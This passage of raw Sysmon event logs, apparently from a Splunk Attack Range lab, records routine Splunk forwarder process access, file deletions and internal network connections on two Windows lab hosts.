Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.967{C8EA50B7-0FC8-6216-D904-000000003802}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.732{C8EA50B7-0FC8-6216-D804-000000003802}52606092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FC8-6216-D804-000000003802}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0FC8-6216-D804-000000003802}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.466{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FC8-6216-D804-000000003802}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.467{C8EA50B7-0FC8-6216-D804-000000003802}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.372{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42309D6451090069CA60D24C4211863A,SHA256=1D9F264D83C68FEAE9C23E9CFEC5E296FA601FB6BB4029F28D10A0E504B2DE44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:20.038{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15814D86808CF4E32EEC1CD4A014E298,SHA256=C66A35A70027C22C36C96CEB994AE1D9FB4CEDA979DB8DE1C3834487C3ECDF74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.201{C8EA50B7-0FC7-6216-D704-000000003802}11043400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:21.388{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=204168A320E7ECDFF3D305F09289CE96,SHA256=F174AEE7521323807FD7BBE31D26E85B3939D569A6DE0897E859E048494679A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:21.053{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0430CC01B54B14789629328A2DF2934E,SHA256=844952A24BD27DA7B24F80564F8B5F050DCC01796A4790A2421EC158740A7DC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53331-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:22.529{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C1124DF940DAFC001409C2836C27DEB,SHA256=D595B4333006D45CA7D5062C718280289E2D1FB7E2E071CC35425BA26FEA3F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:22.069{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D39E8EFD8F5BF051E87E4721FB825413,SHA256=DD2FDE5BA7749D9B9B21FBA13B00C17AE31D113F34BA1222B4F42716BE8F91EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:23.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFB6C2416796A48CC25A0F331351D520,SHA256=EDF13A9E6B7D2DCC2CA3A7DBD6E15985755FD222A93EB92362C0CB7F6E1B8F17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:23.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717D6C7CA669A67928DFF01D84121E53,SHA256=98A8457733CD7BA8A81EF4C0EC2101B93134DF8701CA2F23621554C0B05CAC79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:24.622{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C707724DB7CB8DD79498E4B1A75148DA,SHA256=82F5471E9F7F1C3F31694EC4565A43C3D1A7A0D6727365AF21C2510B7FBDF6D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:24.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D328BA0F593CFDB19DC0D9ECD12870E,SHA256=9F2A54D99C6C8439ECBE16C4AA3997DBBBCDD5FBD436DC2DCD2B266BE3A60284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:25.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A216AC9F1EE78905F9CEF3D4E556D4F4,SHA256=DB23193703B1DFA6880F7C59AEE2C9D81A04A84576EE7111ABD10172CE696BE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:25.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C46BCC30D7DE663CBB2235D08D14F44D,SHA256=5E37A1120A531984A1D371E00C643F314562DB29A2DB9F775F22802F2BC71416,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:24.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53332-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:26.654{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72EA1B60F47DDE777819ABFFD5D36B8F,SHA256=5FA50EB6D7767F73F82C5DF334DBA907F938DC3226BC35AC7C05ECB06EDFF72E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:23.477{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51252-false10.0.1.12-8000- 23542300x8000000000000000215351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:26.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85AD0DB397BAAF1987787D4723A6A36A,SHA256=F26D451EC4C2DA84CA548CEEA3EC36C76FCD3816B22E50731093985CFC879239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:27.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67A3DAEDDE98B146127049E3BC9B7393,SHA256=15EB98AEFB00FEFAAC40697D73B0DD2F0F28681F73B27E04E7E2A3CD20D02E8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:27.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DF5F3DCCAD3EFC1A25AF444370DA51C,SHA256=7D08180B98C20EBC93A436967E19BD6390FD2C60D575442A26695FC97BBB6742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:28.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4480E97CB35AC05D3B0CC2D8E66982F7,SHA256=1EBC043CD099E613141B2C673D30A6934E824E06B9AD02A9BFC5262D0C4FFFC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:28.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F6CFA6AAAAADD1E042F137B53F22EC4,SHA256=9243C67EA30D5F6E7E83BFA89D0FA852377E860D45EBB9466CE5FFE073D56294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:29.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42422536C15EB32B6D0ED8D6C68E3C4F,SHA256=DA101D8E3FBB8A11840E663BB309B029DED890F3E17E9240F863597FCD62B37E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:29.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F75A294FFBBCB7394A454A94A4C517,SHA256=C90B0A87B761C2E5B26571A778B7A219405497B45696BB96729809E7D44957AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:30.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F89AF3F12BECB7BC9FB400CD7E13607,SHA256=A34E622E50BEC7884CFD7B007503DA1B2264762E09F935262D2D1047510757A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:30.256{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E22EDDB31B1D2EBAE3AF3EED73FC27AF,SHA256=33CA05E4F0B4B12370C14FF91576F1A9071678090A467A0F60DF13A8AD624232,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:30.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E4AC5A116E3F0B8E4B12B57379CEB26,SHA256=C306D4AFA95D42B2C0588D0810E846EB8031D4E5D5DF20CD01F376CB3F0AB0AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:29.644{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53333-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:31.732{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3B83828E19205C11EB368CAED6E04B,SHA256=5FC5171028A8D26ADEC11908634530598CAD40F43B49E71406D6A3C791540846,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:28.664{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51253-false10.0.1.12-8000- 23542300x8000000000000000215358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:31.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 